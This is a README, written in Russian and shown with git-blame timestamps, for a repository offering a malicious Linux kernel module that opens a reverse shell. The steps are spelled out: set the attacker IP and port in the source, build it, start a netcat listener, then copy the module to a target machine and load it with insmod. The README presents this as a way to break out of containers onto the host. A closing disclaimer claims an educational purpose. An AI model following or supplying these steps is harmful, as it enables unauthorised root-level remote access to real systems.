lkm_reverse_shell/README.md

42 lines
2.3 KiB
Markdown
Raw Normal View History

2024-07-04 00:34:14 +03:00
# LKM Reverse Shell
2024-07-03 15:22:58 +03:00
2024-07-04 00:59:20 +03:00
В этом репозитории представлен модуль ядра Linux, который выполняет обратный вызов на прослушиватель для установки обратной оболочки
2024-07-04 01:12:12 +03:00
### Инструкция по использованию
Для успешной эксплуатации необходимо подготовить инструментарий для сборки модулей ядра на атакующей машине. Установите пакет build-essential и заголовки ядра:
```bash
sudo apt install build-essential linux-headers-$(uname -r)
```
2024-07-06 17:10:46 +03:00
После клонирования репозитория, откройте файл `reverse-shell.c` и измените 13 строку, указав ваш IP-адрес и порт. Затем соберите модуль:
2024-07-04 01:12:12 +03:00
```bash
git clone https://git.vadimbelous.com/vadim_belous/lkm_reverse_shell.git
cd lkm_reverse_shell
$EDITOR reverse-shell.c
make
```
2024-07-06 17:10:46 +03:00
Получившийся в результате успешной сборки файл `reverse-shell.ko` это и есть нужный модуль ядра
Запустите прослушиватель на машине атакующего:
```bash
nc -lvnp $PORT
```
Перенесите вредоносный модуль на целевую машину и подгрузите его в ядро:
```bash
insmod reverse-shell.ko
```
Если вы всё сделали правильно, на прослушиватель придёт обратный вызов и установится обратная командная оболочка
2024-07-04 01:12:12 +03:00
### Disclaimer
Этот репозиторий создан исключительно в образовательных целях, чтобы продемонстрировать потенциальные методы эксплуатации контейнерных сред путем загрузки вредоносного модуля (LKM) в ядро хостовой ОС. Автор данного репозитория не несет ответственности за любые неправомерные действия, совершенные с использованием этого кода